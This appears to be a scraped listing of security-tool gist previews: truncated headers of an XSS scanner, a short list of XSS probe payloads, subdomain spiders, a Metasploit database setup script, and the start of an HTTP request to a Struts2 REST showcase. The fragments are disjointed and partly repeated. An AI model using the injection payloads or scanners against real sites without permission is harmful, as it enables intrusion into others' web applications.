% Title % Name % Date
List
#!/usr/bin/env python | |
# -*- coding: cp1252 -*- | |
# XSSA is a Cross Site Scripting Scanner & Vulnerability Confirmation | |
# By Yehia Mamdouh - twitter.com/@Yehia1mamdouh / Facebook/yehia.mamdouh.98 | |
import urllib2 | |
from urllib2 import Request, build_opener, HTTPCookieProcessor, HTTPHandler | |
import urllib | |
from urllib import FancyURLopener | |
import cookielib |
''"> | |
”><script>alert(“X”)</script> | |
’><script>alert(1)</script> | |
"><script>alert(1)</script> | |
'><script>alert(1)</script> | |
' '><script>alert(1)</script> | |
"><script>alert(1)</script> | |
'><script>alert(1)</script> | |
<script>alert(1)</script> | |
"><script>alert(1)</script> |
#!/usr/bin/env python | |
# encoding: utf-8 | |
# author: tennc | |
# date: 2015-06-29 | |
# use: python wyspider_dy.py xxx.txt | |
import os | |
import sys | |
#!/usr/bin/env python3 | |
# -*- coding : utf-8 -*- | |
# author: tennc | |
# date: 2016/3/20 | |
# filename: paer.py | |
# 检测一推二级域名200状态,并且爬出名称保存 | |
# url.txt 为二级域名保存文件,save.txt为结果文件。 | |
# The MIT License | |
# NAME | |
# Copyright (c) 2015 |
#!/bin/sh | |
METASPLOIT_BASEDIR=/opt/metasploit-framework | |
DB_CONF=$METASPLOIT_BASEDIR/config/database.yml | |
DB_NAME=msf | |
DB_USER=msf | |
DB_PORT=5432 | |
PG_SERVICE=postgresql |
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1 | |
Host: 127.0.0.1:8080 | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 |
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
# author: tennc | |
# date: 2019年9月23日 | |
import sys | |
import base64 | |
import requests | |
# url = str(sys.argv[1]) |
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
# author: tennc | |
# date: 2019年9月23日 | |
import sys | |
import base64 | |
import requests | |
# url = str(sys.argv[1]) |
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
# author: tennc | |
# date: 2019年9月23日 | |
import sys | |
import base64 | |
import requests | |
# url = str(sys.argv[1]) |